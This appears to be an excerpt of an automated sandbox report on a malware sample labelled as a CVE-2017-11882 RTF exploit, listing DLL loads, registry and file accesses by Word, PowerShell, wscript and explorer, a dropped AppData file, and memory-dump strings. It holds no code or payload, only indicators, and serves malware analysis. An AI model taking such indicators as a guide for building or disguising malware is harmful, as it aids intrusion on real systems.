            Source: C:\Windows\System32\taskeng.exe | Section loaded: wevtapi.dll
            Source: C:\Windows\System32\taskeng.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\taskeng.exe | Section loaded: rpcrtremote.dll
            Source: C:\Windows\System32\taskeng.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\taskeng.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\AppData\Roaming\gwseuha | Section loaded: wow64win.dll
            Source: C:\Users\user\AppData\Roaming\gwseuha | Section loaded: wow64cpu.dll
            Source: C:\Users\user\AppData\Roaming\gwseuha | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\gwseuha | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\gwseuha | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: credssp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
            Source: C:\Windows\explorer.exe | Section loaded: duser.dll
            Source: C:\Windows\explorer.exe | Section loaded: dui70.dll
            Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: slc.dll
            Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
            Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: gwseuha, 00000011.00000000.414661031.00000000013A2000.00000020.00000001.01000000.00000008.sdmp, gwseuha.12.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: gwseuha, 00000011.00000000.414661031.00000000013A2000.00000020.00000001.01000000.00000008.sdmp, gwseuha.12.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
